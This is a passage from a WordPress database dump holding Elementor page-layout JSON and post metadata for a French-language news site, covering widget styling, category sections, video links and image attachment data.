"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"300\",\"twitter_widget_tweet_limit\":\"2\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"2\"],\"excerpt_value\":10,\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3107,928,'_elementor_version','0.4'),(3108,928,'_elementor_css','a:3:{s:4:\"time\";i:1511347861;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(3110,930,'_edit_last','1'),(3111,930,'_edit_lock','1511782491:1'),(3114,930,'_wp_desired_post_slug',''),(3115,933,'_wp_attached_file','2017/11/received_1606639512733963-1.jpeg'),(3116,933,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2001;s:6:\"height\";i:1126;s:4:\"file\";s:40:\"2017/11/received_1606639512733963-1.jpeg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"received_1606639512733963-1-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"received_1606639512733963-1-300x169.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"received_1606639512733963-1-768x432.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:41:\"received_1606639512733963-1-1024x576.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3117,930,'_thumbnail_id','933'),(3118,930,'_wp_page_template','default'),(3121,930,'_yoast_wpseo_content_score','30'),(3122,930,'_yoast_wpseo_primary_category','17'),(3123,930,'post_views_count','685'),(3124,935,'_elementor_edit_mode','builder'),(3125,935,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":41},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":2},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":19},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":16},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":0,\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":24},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\",\"use_icon\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_ma